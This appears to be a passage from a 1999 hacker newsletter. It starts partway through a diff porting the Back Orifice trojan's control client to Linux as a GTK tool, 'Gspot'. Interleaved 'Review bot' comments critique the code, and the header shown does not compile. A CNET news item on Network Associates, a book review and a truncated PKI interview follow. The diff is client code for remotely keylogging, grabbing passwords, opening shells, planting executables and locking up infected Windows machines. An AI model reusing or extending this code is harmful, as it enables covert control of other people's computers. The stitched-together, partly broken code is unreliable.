       +  else if (strcasecmp((char *) data, "NETCONNECT") == 0)       label = gtk_label_new(netconnecthelp);
       +  else if (strcasecmp((char *) data, "NETDISCONNECT") == 0)    label = gtk_label_new(netdisconnecthelp);
       +  else if (strcasecmp((char *) data, "NETLIST") == 0)          label = gtk_label_new(netlisthelp);
       +  else if (strcasecmp((char *) data, "RESOLVE") == 0)          label = gtk_label_new(resolvehelp);
       +  else if (strcasecmp((char *) data, "SHARELIST") == 0)                label = gtk_label_new(sharelisthelp);
       +  else if (strcasecmp((char *) data, "SHAREADD") == 0)         label = gtk_label_new(shareaddhelp);
       +  else if (strcasecmp((char *) data, "SHAREDEL") == 0)         label = gtk_label_new(sharedelhelp);
       +  else if (strcasecmp((char *) data, "PROCLIST") == 0)         label = gtk_label_new(proclisthelp);
       +  else if (strcasecmp((char *) data, "PROCKILL") == 0)         label = gtk_label_new(prockillhelp);
       +  else if (strcasecmp((char *) data, "PROCSPAWN") == 0)                label = gtk_label_new(procspawnhelp);
       +  else if (strcasecmp((char *) data, "LISTCAPS") == 0)         label = gtk_label_new(listcapshelp);
       +  else if (strcasecmp((char *) data, "CAPSCREEN") == 0)                label = gtk_label_new(capscreenhelp);
       +  else if (strcasecmp((char *) data, "CAPFRAME") == 0)         label = gtk_label_new(capframehelp);
       +  else if (strcasecmp((char *) data, "CAPAVI") == 0)           label = gtk_label_new(capavihelp);
       +  else if (strcasecmp((char *) data, "SOUND") == 0)            label = gtk_label_new(soundhelp);
       +  else if (strcasecmp((char *) data, "REDIRLIST") == 0)                label = gtk_label_new(redirlisthelp);
       +  else if (strcasecmp((char *) data, "REDIRDEL") == 0)         label = gtk_label_new(redirdelhelp);
       +  else if (strcasecmp((char *) data, "REDIRADD") == 0)         label = gtk_label_new(rediraddhelp);
       +  else if (strcasecmp((char *) data, "APPADD") == 0)           label = gtk_label_new(appaddhelp);
       +  else if (strcasecmp((char *) data, "APPDEL") == 0)           label = gtk_label_new(appdelhelp);
       +  else if (strcasecmp((char *) data, "APPLIST") == 0)          label = gtk_label_new(applisthelp);
       +  else if (strcasecmp((char *) data, "REGMAKEKEY") == 0)       label = gtk_label_new(regmakekeyhelp);
       +  else if (strcasecmp((char *) data, "REGDELKEY") == 0)                label = gtk_label_new(regdelkeyhelp);
       +  else if (strcasecmp((char *) data, "REGLISTKEYS") == 0)      label = gtk_label_new(reglistkeyshelp);
       +  else if (strcasecmp((char *) data, "REGLISTVALS") == 0)      label = gtk_label_new(reglistvalshelp);
       +  else if (strcasecmp((char *) data, "REGDELVAL") == 0)                label = gtk_label_new(regdelvalhelp);
       +  else if (strcasecmp((char *) data, "REGSETVAL") == 0)                label = gtk_label_new(regsetvalhelp);
       +  else if (strcasecmp((char *) data, "HTTPON") == 0)           label = gtk_label_new(httponhelp);
       +  else if (strcasecmp((char *) data, "HTTPOFF") == 0)          label = gtk_label_new(httpoffhelp);
       +  else if (strcasecmp((char *) data, "TCPSEND") == 0)          label = gtk_label_new(tcpsendhelp);
       +  else if (strcasecmp((char *) data, "TCPRECV") == 0)          label = gtk_label_new(tcprecvhelp);
       +  else if (strcasecmp((char *) data, "LOCKUP") == 0)           label = gtk_label_new(lockuphelp);
       +  else if (strcasecmp((char *) data, "PLUGINEXEC") == 0)       label = gtk_label_new(pluginexechelp);
       +  else if (strcasecmp((char *) data, "PLUGINKILL") == 0)       label = gtk_label_new(pluginkillhelp);
       +  else if (strcasecmp((char *) data, "PLUGINLIST") == 0)       label = gtk_label_new(pluginlisthelp);
       +  else {
       +    snprintf ( labelTemp, 10, "No help for '%s'\n", (char *) data);
       +    label = gtk_label_new(labelTemp);
       +  }
       +
       +  gtk_box_pack_start (GTK_BOX (GTK_DIALOG (helpWindow)->vbox), label, TRUE,
       +                     TRUE, 0);
       +  gtk_widget_show (label);
       +  gtk_widget_show (helpWindow);
       +
       +}
       +
       +int main( int argc, char *argv[] ) 
       +{
       +  int clientport = 0;
       +  struct linger linger;
       +  int bufsize;
       +  GtkWidget *window;
       +  GtkWidget *kitchenTable;
       +  GtkWidget *hbox, *vbox;
       +#if GTK_MINOR_VERSION >= 2
       +  GtkWidget *probeScroll;
       +#endif
       +  GtkWidget *probeList;
       +  GtkWidget *helpBUTTon, *exeBUTTon;
       +  GtkWidget *hostLabel, *portLabel, *passLabel;
       +  // As a reminder, the following components are global:
       +  /*
       +    GtkWidget *returnScreen;
       +    GtkWidget *rsScroll;
       +    GtkWidget *hostText, *portText, *arg1Text, *arg2Text, *passText;
       +    GtkWidget *arg1Label, *arg2Label;
       +   */
       +
       +  gtk_init (&argc, &argv);
       +  initializeProbes();
       +
       +  // Initialize the UDP port
       +  host = 0;
       +  g_packet = 0;
       +  g_password[0] = 0;
       +  strcpy(cwd, "c:\\");
       +  if ( (udpsock = socket(PF_INET, SOCK_DGRAM, 0)) < 0)
       +    {
       +      perror("socket: ");
       +      return(1);
       +    }
       +  memset(&sockaddr, 0, sizeof(sockaddr));
       +  sockaddr.sin_family = AF_INET;
       +  sockaddr.sin_port = htons((u_short)clientport);
       +  if ( (bind(udpsock, (struct sockaddr *)&sockaddr, sizeof(sockaddr))) < 0)
       +    {
       +      perror("bind: ");
       +      return(1);
       +    }
       +  linger.l_onoff = 0;          // dont linger 
       +  setsockopt(udpsock, SOL_SOCKET, SO_LINGER, (void *)&linger, sizeof(linger) );
       +  
       +
       +  
       +  // Create the window
       +  window = gtk_window_new (GTK_WINDOW_TOPLEVEL);
       +  gtk_window_set_title (GTK_WINDOW (window), "Gspot");
       +  gtk_container_border_width (GTK_CONTAINER (window), 5);
       +  gtk_widget_set_usize (GTK_WIDGET (window), 500, 400);
       +  gtk_signal_connect (GTK_OBJECT (window), "delete_event",
       +                     GTK_SIGNAL_FUNC (destroy), NULL);
       +  gtk_signal_connect (GTK_OBJECT (window), "destroy",
       +                     GTK_SIGNAL_FUNC (destroy), NULL);
       +
       +  // Create the table container
       +  kitchenTable = gtk_table_new(4, 3, FALSE);
       +  gtk_table_set_row_spacings( GTK_TABLE(kitchenTable), 2 );
       +  gtk_table_set_col_spacings( GTK_TABLE(kitchenTable), 2 );
       +  gtk_container_add (GTK_CONTAINER (window), kitchenTable);
       +  gtk_widget_show(kitchenTable);
       +
       +  // Use a CList item with one column for the commands
       +  probeList = gtk_clist_new(1);
       +  gtk_clist_set_selection_mode( GTK_CLIST(probeList), GTK_SELECTION_BROWSE );
       +#if GTK_MINOR_VERSION >= 1
       +  probeScroll = gtk_scrolled_window_new( NULL, NULL );
       +  gtk_scrolled_window_set_policy( GTK_SCROLLED_WINDOW (probeScroll), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC);
       +  gtk_clist_set_shadow_type( GTK_CLIST(probeList), GTK_SHADOW_ETCHED_IN);
       +#else
       +  gtk_clist_set_border(GTK_CLIST(probeList), GTK_SHADOW_ETCHED_IN);
       +  gtk_clist_set_policy(GTK_CLIST(probeList), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC );
       +#endif
       +  gtk_clist_column_titles_passive(GTK_CLIST(probeList));
       +  gtk_clist_set_column_title(GTK_CLIST(probeList), 0, "Commands" );
       +  gtk_clist_column_titles_show(GTK_CLIST(probeList));
       +  gtk_clist_set_column_width(GTK_CLIST(probeList), 175, 0 );
       +  gtk_widget_set_usize (GTK_WIDGET (probeList), 175, 0);
       +  pidx = 0;
       +  while(probeArray[pidx].Name[0] != NULL) {
       +    gtk_clist_append( (GtkCList*) probeList, probeArray[pidx].Name);
       +    pidx++;
       +  }
       +  gtk_signal_connect (GTK_OBJECT(probeList), "select_row",
       +                    GTK_SIGNAL_FUNC(select_probe), NULL);
       +#if GTK_MINOR_VERSION >= 1
       +  gtk_table_attach( GTK_TABLE(kitchenTable), probeScroll, 0, 1, 0, 3,
       +                   GTK_FILL, GTK_FILL | GTK_EXPAND, 0, 0);
       +  gtk_scrolled_window_add_with_viewport( GTK_SCROLLED_WINDOW (probeScroll), GTK_WIDGET (probeList) );
       +  gtk_widget_set_usize (GTK_WIDGET (probeScroll), 175, 0);
       +  gtk_widget_show(probeScroll);
       +#else
       +  gtk_table_attach( GTK_TABLE(kitchenTable), probeList, 0, 1, 0, 3,
       +                   GTK_FILL, GTK_FILL | GTK_EXPAND, 0, 0);
       +#endif
       +  gtk_widget_show(probeList);
       +  
       +  // Help and Exe buttons
       +  hbox = gtk_hbox_new(TRUE, 2);
       +  gtk_table_attach( GTK_TABLE(kitchenTable), hbox, 0, 1, 3, 4,
       +                   GTK_FILL | GTK_SHRINK, GTK_SHRINK, 3, 3);
       +  gtk_widget_show (hbox);
       +  helpBUTTon = gtk_button_new_with_label("Help");
       +  gtk_signal_connect (GTK_OBJECT (helpBUTTon), "clicked",
       +                     GTK_SIGNAL_FUNC (helpDialog), currentProbe);
       +  gtk_box_pack_start(GTK_BOX(hbox), helpBUTTon, TRUE, TRUE, 0);
       +  gtk_widget_show (helpBUTTon);
       +
       +  hbox = gtk_hbox_new(TRUE, 2);
       +  gtk_table_attach( GTK_TABLE(kitchenTable), hbox, 1, 2, 3, 4,
       +                   GTK_FILL | GTK_EXPAND | GTK_SHRINK, GTK_SHRINK, 3, 3);
       +  gtk_widget_show (hbox);
       +  exeBUTTon = gtk_button_new_with_label("Execute");
       +  gtk_signal_connect (GTK_OBJECT (exeBUTTon), "clicked",
       +                     GTK_SIGNAL_FUNC (execute), currentProbe);
       +  gtk_box_pack_start(GTK_BOX(hbox), exeBUTTon, TRUE, TRUE, 0);
       +  gtk_widget_show (exeBUTTon);
       +
       +  // Text area, not editable, but our returned info goes here.
       +  hbox = gtk_hbox_new(FALSE, 2);
       +  gtk_table_attach( GTK_TABLE(kitchenTable), hbox, 1, 3, 0, 1,
       +                   GTK_FILL | GTK_EXPAND | GTK_SHRINK, GTK_FILL | GTK_EXPAND, 1, 1);
       +  gtk_widget_show (hbox);
       +  returnScreen = gtk_text_new(NULL, NULL);
       +  gtk_text_set_editable(GTK_TEXT(returnScreen), FALSE);
       +  gtk_text_set_word_wrap(GTK_TEXT(returnScreen), FALSE);
       +  gtk_box_pack_start(GTK_BOX(hbox), returnScreen, TRUE, TRUE, 0);
       +  gtk_widget_show (returnScreen);
       +  rsScroll = gtk_vscrollbar_new (GTK_TEXT(returnScreen)->vadj);
       +  gtk_box_pack_start(GTK_BOX(hbox), rsScroll, FALSE, FALSE, 0);
       +  gtk_widget_show (rsScroll);
       +  
       +
       +  // Use vbox and label for text entries
       +  vbox = gtk_vbox_new(FALSE, 2);
       +  gtk_table_attach( GTK_TABLE(kitchenTable), vbox, 1, 2, 1, 2,
       +                   GTK_FILL | GTK_EXPAND | GTK_SHRINK, GTK_SHRINK, 3, 3);
       +  gtk_widget_show (vbox);
       +  arg1Label = gtk_label_new("Unused:");
       +  gtk_misc_set_alignment (GTK_MISC (arg1Label), 0, 0);
       +  gtk_box_pack_start(GTK_BOX(vbox), arg1Label, FALSE, FALSE, 0);
       +  gtk_widget_show (arg1Label);
       +  arg1Text = gtk_entry_new_with_max_length(ARGSIZE);
       +  gtk_widget_set_usize(GTK_WIDGET(arg1Text), 100, 0);
       +  gtk_widget_set_name(GTK_WIDGET(arg1Text), "arg1Text");
       +  gtk_box_pack_start(GTK_BOX(vbox), arg1Text, FALSE, FALSE, 0);
       +  gtk_widget_show (arg1Text);
       +
       +  vbox = gtk_vbox_new(FALSE, 2);
       +  gtk_table_attach( GTK_TABLE(kitchenTable), vbox, 2, 3, 1, 2,
       +                   GTK_FILL | GTK_EXPAND | GTK_SHRINK, GTK_SHRINK, 3, 3);
       +  gtk_widget_show (vbox);
       +  arg2Label = gtk_label_new("Unused:");
       +  gtk_misc_set_alignment (GTK_MISC (arg2Label), 0, 0);
       +  gtk_box_pack_start(GTK_BOX(vbox), arg2Label, FALSE, FALSE, 0);
       +  gtk_widget_show (arg2Label);
       +  arg2Text = gtk_entry_new_with_max_length(ARGSIZE);
       +  gtk_widget_set_usize(GTK_WIDGET(arg2Text), 100, 0);
       +  gtk_widget_set_name(GTK_WIDGET(arg2Text), "arg2Text");
       +  gtk_box_pack_start(GTK_BOX(vbox), arg2Text, FALSE, FALSE, 0);
       +  gtk_widget_show (arg2Text);
       +
       +
       +  // Text entries for Host and Port
       +  vbox = gtk_vbox_new(FALSE, 2);
       +  gtk_table_attach( GTK_TABLE(kitchenTable), vbox, 1, 2, 2, 3,
       +                   GTK_FILL | GTK_EXPAND | GTK_SHRINK, GTK_SHRINK, 3, 3);
       +  gtk_widget_show (vbox);
       +  hostLabel = gtk_label_new("Host:");
       +  gtk_misc_set_alignment (GTK_MISC (hostLabel), 0, 0);
       +  gtk_box_pack_start(GTK_BOX(vbox), hostLabel, FALSE, FALSE, 0);
       +  gtk_widget_show (hostLabel);
       +  hostText = gtk_entry_new_with_max_length(ARGSIZE);
       +  gtk_widget_set_usize(GTK_WIDGET(hostText), 100, 0);
       +  gtk_widget_set_name(GTK_WIDGET(hostText), "hostText");
       +  gtk_entry_set_text(GTK_ENTRY(hostText), "127.0.0.1");
       +  strcpy(oldhost, "127.0.0.1");
       +  gtk_box_pack_start(GTK_BOX(vbox), hostText, FALSE, FALSE, 0);
       +  gtk_widget_show (hostText);
       +
       +  vbox = gtk_vbox_new(FALSE, 2);
       +  gtk_table_attach( GTK_TABLE(kitchenTable), vbox, 2, 3, 2, 3,
       +                   GTK_FILL | GTK_EXPAND | GTK_SHRINK, GTK_SHRINK, 3, 3);
       +  gtk_widget_show (vbox);
       +  portLabel = gtk_label_new("Port:");
       +  gtk_misc_set_alignment (GTK_MISC (portLabel), 0, 0);
       +  gtk_box_pack_start(GTK_BOX(vbox), portLabel, FALSE, FALSE, 0);
       +  gtk_widget_show (portLabel);
       +  portText = gtk_entry_new_with_max_length(5);
       +  gtk_widget_set_usize(GTK_WIDGET(portText), 100, 0);
       +  gtk_widget_set_name(GTK_WIDGET(portText), "portText");
       +  sprintf(buff, "%i", PORT);
       +  gtk_entry_set_text(GTK_ENTRY(portText), buff);
       +  strcpy(oldport, buff);
       +  gtk_box_pack_start(GTK_BOX(vbox), portText, FALSE, FALSE, 0);
       +  gtk_widget_show (portText);
       +
       +  vbox = gtk_vbox_new(FALSE, 2);
       +  gtk_table_attach( GTK_TABLE(kitchenTable), vbox, 2, 3, 3, 4,
       +                   GTK_FILL | GTK_EXPAND | GTK_SHRINK, GTK_SHRINK, 3, 3);
       +  gtk_widget_show (vbox);
       +  passLabel = gtk_label_new("Password:");
       +  gtk_misc_set_alignment (GTK_MISC (passLabel), 0, 0);
       +  gtk_box_pack_start(GTK_BOX(vbox), passLabel, FALSE, FALSE, 0);
       +  gtk_widget_show (passLabel);
       +  passText = gtk_entry_new_with_max_length(ARGSIZE);
       +  gtk_widget_set_usize(GTK_WIDGET(passText), 100, 0);
       +  gtk_widget_set_name(GTK_WIDGET(passText), "passText");
       +  gtk_signal_connect (GTK_OBJECT (passText), "changed",
       +                     GTK_SIGNAL_FUNC (update_value), 
       +                     gtk_entry_get_text( GTK_ENTRY(passText) ) );
       +  gtk_box_pack_start(GTK_BOX(vbox), passText, FALSE, FALSE, 0);
       +  gtk_widget_show (passText);
       +  
       +  // Show the window and start running
       +  gtk_widget_show (window);
       +  gtk_main();
       +
       +  return(0);  
       +
       +}
       +
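        Review bot: the `gtk_signal_connect (GTK_OBJECT (passText), "changed", ...)` call passes the return value of `gtk_entry_get_text( GTK_ENTRY(passText) )` as the callback data. That is a pointer into the entry's internal text buffer as it stands at connect time (an empty string here), and GTK 1.x may reallocate that buffer as the user types, so update_value can end up reading stale or freed memory instead of the current password; pass the entry itself (`GTK_OBJECT(passText)`, or use gtk_signal_connect_object) and call gtk_entry_get_text() inside update_value. Nothing in this hunk masks the password field either; add `gtk_entry_set_visibility(GTK_ENTRY(passText), FALSE);` so the server password is not echoed on screen. Finally, `strcpy(oldhost, "127.0.0.1")`, `strcpy(oldport, buff)` and `sprintf(buff, "%i", PORT)` write into buffers whose sizes are not visible in this hunk; confirm oldhost holds ARGSIZE+1 bytes (the entry's maximum) and oldport at least 6, or use strncpy/snprintf with the buffer sizes.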
       diff -ruN bo/gspot.h bo_gspot/gspot.h
       --- bo/gspot.h  Wed Dec 31 16:00:00 1969
       +++ bo_gspot/gspot.h    Thu Dec 24 17:16:12 1998
       @@ -0,0 +1,73 @@
       +#define PROBE_STR_MAX 30
       +
       +struct probeListItem {
       +  gchar Name[PROBE_STR_MAX + 1];
       +  gchar firstArg[PROBE_STR_MAX + 1[];
       +  gchar secondArg[[PROBE_STR_MAX + 1];
       +}
       +
       +  gchar *probes[63][1] = { "HOST",
       +                          "QUIT",
       +                          "PING",
       +                          "PINGLIST",
       +                          "SWEEP",
       +                          "SWEEPLIST",
       +                          "SHELL",
       +                          "STATUS",
       +                          "PASSWD",
       +                          "DIR",
       +                          "CD",
       +                          "DEL",
       +                          "GET",
       +                          "PUT",
       +                          "COPY",
       +                          "FIND",
       +                          "FREEZE",
       +                          "MELT",
       +                          "VIEW",
       +                          "REN",
       +                          "MD",
       +                          "RD",
       +                          "INFO",
       +                          "PASSES",
       +                          "DIALOG",
       +                          "KEYLOG",
       +                          "REBOOT",
       +                          "NETVIEW",
       +                          "NETCONNECT",
       +                          "NETDISCONNECT",
       +                          "NETLIST",
       +                          "RESOLVE",
       +                          "SHARELIST",
       +                          "SHAREADD",
       +                          "SHAREDEL",
       +                          "PROCLIST",
       +                          "PROCKILL",
       +                          "PROCSPAWN",
       +                          "LISTCAPS",
       +                          "CAPSCREEN",
       +                          "CAPFRAME",
       +                          "CAPAVI",
       +                          "SOUND",
       +                          "REDIRLIST",
       +                          "REDIRDEL",
       +                          "REDIRADD",
       +                          "APPADD",
       +                          "APPDEL",
       +                          "APPLIST",
       +                          "REGMAKEKEY",
       +                          "REGDELKEY",
       +                          "REGLISTKEYS",
       +                          "REGLISTVALS",
       +                          "REGDELVAL",
       +                          "REGSETVAL",
       +                          "HTTPON",
       +                          "HTTPOFF",
       +                          "TCPSEND",
       +                          "TCPRECV",
       +                          "LOCKUP",
       +                          "PLUGINEXEC",
       +                          "PLUGINKILL",
       +                          "PLUGINLIST"};
       +  
       +
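        Review bot: the struct probeListItem definition does not compile: `gchar firstArg[PROBE_STR_MAX + 1[];` has a stray `[`, `gchar secondArg[[PROBE_STR_MAX + 1];` has a doubled `[[`, and the closing `}` is missing its `;`. The probe table has the same shape problem: `gchar *probes[63][1] = { "HOST", ...}` declares a 63x1 array of pointers and relies on brace elision to fill it from a flat list, so every lookup needs a `[i][0]`; `gchar *probes[] = { ... };` (the list does have 63 entries) is what callers would expect. Since this is a header, the definition will also produce multiple-definition link errors if gspot.h is included from more than one file; make it `static const gchar *probes[]` or move the definition into a .c file and leave an `extern` declaration here.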
       diff -ruN bo/helpstrings.h bo_gspot/helpstrings.h
       --- bo/helpstrings.h    Wed Aug  5 21:35:31 1998
       +++ bo_gspot/helpstrings.h      Wed Dec 23 23:50:09 1998
       @@ -11,7 +11,7 @@
        char pinglisthelp[] =  "\
         PINGLIST - Pings a lits of ip addresses in a text file\n\
         usage:    pinglist localfilename\n\
       - example:  pinglist C:\bo\\bohosts";
       + example:  pinglist /home/uname/bo/bohosts";
        
        char sweephelp[] =     "\
         SWEEP - Sweeps a subnet with ping packets\n\
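        Review bot: the removed example `C:\bo\\bohosts` carried an unescaped `\b`, which the C compiler turns into a backspace, so the Unix path is an improvement beyond the port itself. The placeholder `uname` in `/home/uname/bo/bohosts` reads like the uname(1) command rather than "your user name"; `/home/<user>/bo/bohosts` or `~/bo/bohosts` would be clearer, and the same applies to the sweeplist, get and put examples below.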
       @@ -21,7 +21,7 @@
        char sweeplisthelp[] = "\
         SWEEPLIST - Sweeps a list of subnets in a text file\n\
         usage:    sweeplist localfilename\n\
       - example:  sweeplist c:\\bo\\dialups";
       + example:  sweeplist /home/uname/bo/dialups";
        
        char shellhelp[] =     "SHELL - Opens a command shell";
        
       @@ -49,13 +49,13 @@
        char gethelp[] =       "\
         GET - Transfers a file from remote host to the local computer\n\
         usage:    get remotefilename localfilename\n\
       - example:  get c:\\warez\\photoshop.zip c:\\files\\photoshop5.zip\n\
       + example:  get c:\\warez\\photoshop.zip /home/uname/files/photoshop5.zip\n\
         note:  If localfilename is not provided file is stored in current local directory";
        
        char puthelp[] =       "\
         PUT - Transfers a file from local computer to the remote host\n\
         usage:    put localfilename remotefilename\n\
       - example:  put c:\\bo\\boupdate.exe c:\\windows\\system\\b.exe\n\
       + example:  put /home/uname/bo/boupdate.exe c:\\windows\\system\\b.exe\n\
         note:  If remotefilename is not provided file is stored in current remote directory";
        
        char copyhelp[] =      "\
       
       @HWA              
       
  41.0 Network Associates unveils middleware 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  
     Network Associates unveils middleware 
     By Tim Clark
     Staff Writer, CNET News.com
     April 5, 1999, 9:45 a.m. PT 

     update Seeking to simplify security management, Network Associates today rolled out middleware
     for securing corporate networks against computer viruses, outside intruders, and internal hackers. 

     Network Associates, which built its security product line through a series of acquisitions, also
     is rolling out additions to its security software lineup and releasing new versions of its existing
     security products. 

     The company is stopping short of a full, centralized console that a security administrator could 
     use to control all aspects of a corporation's network security. Instead, Network Associates is 
     offering middleware, called Event Orchestrator, which coordinates how different pieces of its 
     software communicate with each other. 

     For example, the security middleware could transfer information about an attack, detected by Network 
     Associates' CyberCop intrusion-detection software, to a Gauntlet firewall that could shut off the 
     entryway the attacker was using. 

     Among the new offerings: Client virtual private network (VPN) software that allows remote users to
     dial in securely to corporate networks over the Internet, instead of using dedicated lines or 
     toll-free phone numbers. The VPN client is part of a new PGP VPN suite, named after one of the 
     company's early acquisitions, Pretty Good Privacy. The suite includes VPN server software, the 
     company's Gauntlet firewall, and a public key infrastructure (PKI) for issuing and managing digital 
     certificates. 

     The new VPN client, designed for mobile users or extranet connections with business partners, is built
     on PGP desktop encryption software that scrambles data sent via email or stored securely in files or 
     on disks. 

     The VPN suite is part of the "Active Security" suite that Network Associates is unveiling before
     today's opening day baseball game of the Oakland A's against the New York Yankees, scheduled
     this evening in the newly renamed Network Associates Coliseum in Oakland. 

     Network Associates also released version 5.0 of its Gauntlet firewall and CyberCop 5.0, its intrusion
     protection product that includes Sting, a decoy that lures hackers into parts of a network where they
     can be detected and caught. 

     Network Associates also announced security partnerships with Microsoft for its proxy server and
     Windows 2000, Hewlett-Packard, Sun Microsystems, public key infrastructure firms Entrust, and
     VeriSign, Cigna, and systems integrators Ernst & Young, PricewaterhouseCoopers, KPMG, and
     GTE Government Systems. 

     Network Associates began as an anti-virus software vendor, and its McAfee anti-virus products are
     widely used. After merging with Network General in late 1997, the company changed its name to Network
     Associates and continued to acquire security companies and their products, including encryption firm 
     PGP, firewall maker Trusted Information Systems, European antivirus vendor Dr Solomon's, and 
     intrusion-detection firm Secure Networks. 

     But Network Associates' "suite strategy"--in which it offers a full line of security software--has 
     drawn criticism. 

     In a Forrester Research report published in late 1998 the research firm argued that "security suites 
     are nothing more than point products cobbled together. By the time vendors properly integrate them, a
     shift in Fortune 1000 security buying patterns and security requirements will conspire to make monolithic
     suites irrelevant." 

     Critics have contrasted the security suite strategy with the "best of breed" approach taken by other 
     vendors who create individual products in separate security technologies. In recent months, Network 
     Associates executives have been calling its offerings "a best-of-breed security suite." 
       
      
      @HWA
      
 42.0  Book review: "Hacker Proof" Lars Klander 1997
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Forwarded From: "Rob Slade" <rslade@sprint.ca>
       
       
       BKHKRPRF.RVW   990228
       
       
       "Hacker Proof", Lars Klander, 1997, 1-884133-55-X, U$54.95/C$74.95
       %A   Lars Klander lklander@jamsa.com
       %C   2975 S. Rainbow Blvd., Suite 1, Las Vegas, NV   89102
       %D   1997
       %G   1-884133-55-X
       %I   Jamsa Press/Gulf Publishing Co.
       %O   U$54.95/C$74.95 800-432-4112 fax 713-525-4670 starksm@gulfpub.com
       %P   660 p. + CD-ROM
       %T   "Hacker Proof: The Ultimate Guide to Network Security"
       
       
       There is a great deal of information on security contained within this
       book.  Unfortunately, it is presented without a cohesive framework.  The
       overall impression is good.  A lot of the forms that would make up a
       useful work are followed, such as a summary (rather ironically, in view of
       the scattered nature of the text, called "Putting It All Together") and a
       set of resources at the end of every chapter.  The author seems to be
       easily distracted, continually jumping to the next, more sensational,
       topic. 
       
       
       Although not divided into parts, the contents do have some logical
       divisions.  Initially, we are presented with what seems to be intended as
       background material, although the scattergun approach leaves all of the
       synthesis up to the reader.  Chapter one is a rather unfocussed
       introduction, talking as much about Internet technologies as about
       security.  Errors are rather common, ranging from chunks missing out of
       sentences to figures with no cutlines to security weaknesses that are
       essentially duplicates of each other to mailing lists that haven't
       distributed material for years (with contact addresses that are even
        older).  Theoretically the networking concepts and details in chapter two
        might aid in understanding system vulnerabilities, but in the rest of the
        book they do not seem to be used effectively.  The discussion of firewalls
        does not provide sufficient information about either the needs,
        weaknesses, or possible inconveniences of the different types in chapter
        three.  The material on encryption, in chapter four, mentions a number of
        the currently important standards, but the explanations are so flawed that
        the chapter could not be used to inform a decision on the strength or use
        of a cryptographic system. Material on the use of digital signatures is
        fairly short, and the remainder of chapter five rehashes, without really
        expanding, old ground. 
       
       
       Another section tries to delve into more networking protocols.  Chapter
       six, on HTTP (HyperText Transfer Protocol), is somewhat disjointed, and,
       again, fails to seriously examine the security implications.  S-HTTP
       (Secure HyperText Transfer Protocol), in chapter seven, deals mostly with
       packets and commands, although it does have some limited discussion of
       function.  The Secure Socket Layer (SSL)  seems to look primarily at
       arcana rather than use. 
       
       
       Chapter nine looks at a few common forms of attack, but presents
       information somewhat at random.  Kerberos is reasonably well described in
       chapter ten.  Some types of electronic commerce technology are mentioned
       in chapter eleven.  There is an extremely limited look at auditing in
       chapter twelve, first for UNIX and then for NT.  A very rough look at
       security issues within the Java programming language makes up chapter
       thirteen.  Chapter fourteen's look at viruses has good basic explanations,
       but is unreliable in practice. 
       
       
       The remaining chapters generally look at security for specific systems. 
       Chapters fifteen to seventeen very quickly talk about individual security
       functions in NT, NetWare, and UNIX, but fail to analyze, for example, the
       effective rights granted by combinations of the different privilege
       granting mechanisms.  SATAN (System Administrator's Tool for Analyzing
       Networks) for UNIX and Kane Security Analyst for NT get quick overviews in
       chapter eighteen. Chapter nineteen presents a number of security
       vulnerabilities with the Netscape and particularly the Internet Explorer
       Web browsers.  CGI (Common Gateway Interface) form weaknesses are
       discussed in chapter twenty, but with so many different languages that the
       ultimate advice is simply don't make a mistake when programming. 
       
       
        The final chapter is a reasonable look at security policies.  However,
        with so many items missing from the background provided, the chance of
        producing a good policy at this point is relatively small. 
       
       
       As with "Maximum Security" (cf. BKMAXSEC.RVW), this book attempts to cover
       the enormous field of security by throwing out as many bits as possible. 
       Therefore large holes are apparent in the coverage.  In addition, the book
       lacks an overall framework that could be used to build a security
       structure and point the way to vulnerabilities that were not addressed. 
       For those who already are well comfortable with security as a concept,
       this volume does have a lot of references that might be of use.  For those
       new to the topic, it is not reliable enough to start with. 
       
       
       copyright Robert M. Slade, 1999 BKHKRPRF.RVW 990228
       
       
       
       -o-
       Subscribe: mail majordomo@repsec.com with "subscribe isn".
       Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
       
       @HWA       
 
  43.0 The Year Of PKI (Public Key Infrastructure)
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       

       Forwarded From: darek milewski <darekm@cmeasures.com>
       
       http://www.infoworld.com/cgi-bin/displayArchive.pl?/99/14/n03-14.47.htm
       
       The year of PKI
       
       
       The growing need for secure Web transactions will
       boost PKI implementations at Entrust Technologies
       By Matthew Nelson
       
       
       Network security has become a necessity with the spread of Internet
       commerce and the expansion of intranets to larger extranets. But with
       differing network systems, secure connections that are constantly updated
       can be a difficult proposition.  One possible solution is the use of
       public key infrastructure (PKI)  systems and digital certificates. To
       discuss PKI and what it means for the enterprise, InfoWorld Senior Writer
       Matthew Nelson recently sat down with John Ryan, chief executive officer
       of Entrust Technologies, one of the leading PKI system providers. 
       
       
       InfoWorld: Do you consider 1999 the year of PKI? 
       
       
       Ryan: There's no question that the recognition by companies that they will
       all need a PKI is now upon us, and we're seeing incredible acceleration of
       pilot activity and recognition across our customer base. So I think this
       year will be the year where people recognize they will definitely have a
       PKI in their enterprise and start the methodical planning to ensure they
       pick the right one. 
       
       
       InfoWorld: Why is PKI seeing adoption now when it is a technology that has
       been around for quite awhile? 
       
       
       Ryan: Not unlike the Internet [that] was around for almost 20 years before
       all of a sudden it took off, there's been some fundamental things that
       happened in the enterprise that have now driven the need, and made it a
       lower risk decision for the enterprise. The first was certificates, or PKI
       capabilities, which were embedded in the browsers. The next thing that
       happened was the major 20 vendors in the networking world -- the whole
       crew in networking and firewalls -- all standardized around a standard
       called IP SET [Secure Electronic Transaction], which includes digital
       certificates. So basically, each application in an enterprise now, or the
       major applications of an enterprise backbone, are including security as a
       fundamental element, which is forcing companies to consider a public key
       infrastructure. 
       
       
       InfoWorld: What developments should IT managers expect to see during the
       next year? 
       
       
       Ryan: I think you're going to see a much more wide-scale enablement of
       applications, which really is going to make it much simpler for the
       enterprise to install a PKI, because the applications will be ready to
       accept it. 
       
       
       I also think you're going to see networks of trust being created. I think
       one of the first ones we saw was the banking community with their global
       trust organization, which is a high-value, high-trust network for
       Web-based electronic transactions. 
       
       
       InfoWorld: Is there a problem with interoperability between different
       companies' digital certificates? 
       
       
       Ryan: Fortunately, the industry standards that enable interoperability
       have now passed. But actually, we now can support interworking with
       VeriSign, GTE, Microsoft, Netscape, and others, today, in our product. So
       we actually do have full interoperability in our product and we can create
       webs of trust that include VeriSign or GTE certificate authorities, webbed
